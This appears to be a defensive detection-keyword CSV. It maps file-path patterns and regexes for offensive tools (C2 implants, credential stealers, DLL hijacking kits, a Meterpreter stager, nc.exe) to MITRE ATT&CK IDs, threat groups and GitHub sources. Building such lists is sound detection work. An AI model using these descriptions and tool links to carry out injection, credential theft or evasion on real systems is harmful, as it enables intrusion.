"*\tests\beacon64.bin*",".{0,1000}\\tests\\beacon64\.bin.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","19320"
"*\TexttoExe.ps1*",".{0,1000}\\TexttoExe\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19321"
"*\TGSThief\*",".{0,1000}\\TGSThief\\.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","0","N/A","N/A","9","2","181","27","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z","19322"
"*\TGT_Monitor.ps1*",".{0,1000}\\TGT_Monitor\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","19323"
"*\TGT_Monitor.ps1*",".{0,1000}\\TGT_Monitor\.ps1.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/TGT_Monitor","1","0","N/A","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","19324"
"*\thanatos.dll*",".{0,1000}\\thanatos\.dll.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","19325"
"*\thanatos.exe*",".{0,1000}\\thanatos\.exe.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","19326"
"*\the-backdoor-factory\*",".{0,1000}\\the\-backdoor\-factory\\.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","19327"
"*\Theif.dll*",".{0,1000}\\Theif\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","19328"
"*\ThemeBleed.exe *",".{0,1000}\\ThemeBleed\.exe\s.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gabe-k/themebleed","1","0","N/A","N/A","10","2","196","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z","19329"
"*\ThemeBleed.sln*",".{0,1000}\\ThemeBleed\.sln.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gabe-k/themebleed","1","0","N/A","N/A","10","2","196","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z","19330"
"*\TheThing.exe*",".{0,1000}\\TheThing\.exe.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","19331"
"*\ThievingFox.py*",".{0,1000}\\ThievingFox\.py.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","19332"
"*\thread-injector.exe*",".{0,1000}\\thread\-injector\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","19333"
"*\Throwback.exe*",".{0,1000}\\Throwback\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","19334"
"*\Throwback\Throwback.h*",".{0,1000}\\Throwback\\Throwback\.h.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","19335"
"*\ThrowbackDLL\*",".{0,1000}\\ThrowbackDLL\\.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","19336"
"*\Throwback-master.zip*",".{0,1000}\\Throwback\-master\.zip.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","19337"
"*\ThunderFox.exe*",".{0,1000}\\ThunderFox\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19338"
"*\Thycotic.ihawu.EncryptionProtection_x64.dll*",".{0,1000}\\Thycotic\.ihawu\.EncryptionProtection_x64\.dll.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","19339"
"*\Thycotic.ihawu.EncryptionProtection_x86.dll*",".{0,1000}\\Thycotic\.ihawu\.EncryptionProtection_x86\.dll.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","19340"
"*\thycotic_secretserver_dump.rb*",".{0,1000}\\thycotic_secretserver_dump\.rb.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","19341"
"*\ticket_converter.py*",".{0,1000}\\ticket_converter\.py.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","0","N/A","N/A","10","2","167","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z","19342"
"*\ticketConverter.py*",".{0,1000}\\ticketConverter\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19343"
"*\ticketer.exe*",".{0,1000}\\ticketer\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19344"
"*\ticketer.py*",".{0,1000}\\ticketer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19345"
"*\Tickets\KerbDump*",".{0,1000}\\Tickets\\KerbDump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","19346"
"*\TIG3R RAT v*.exe*",".{0,1000}\\TIG3R\sRAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19347"
"*\TikiCompiler.txt*",".{0,1000}\\TikiCompiler\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","19351"
"*\TikiService.exe*",".{0,1000}\\TikiService\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","19352"
"*\TikiSpawn.*",".{0,1000}\\TikiSpawn\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","19353"
"*\tikispawn.xml*",".{0,1000}\\tikispawn\.xml.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","19354"
"*\TikiTorch\Aggressor*",".{0,1000}\\TikiTorch\\Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","19355"
"*\TimeException.cpp*",".{0,1000}\\TimeException\.cpp.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","19356"
"*\TimeException.exe*",".{0,1000}\\TimeException\.exe.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","19357"
"*\TimeException-main*",".{0,1000}\\TimeException\-main.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","19358"
"*\tinymet.exe*",".{0,1000}\\tinymet\.exe.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","0","N/A","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","19359"
"*\tmp\dll-collection*",".{0,1000}\\tmp\\dll\-collection.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","19363"
"*\Tmp\nc.exe*",".{0,1000}\\Tmp\\nc\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19364"
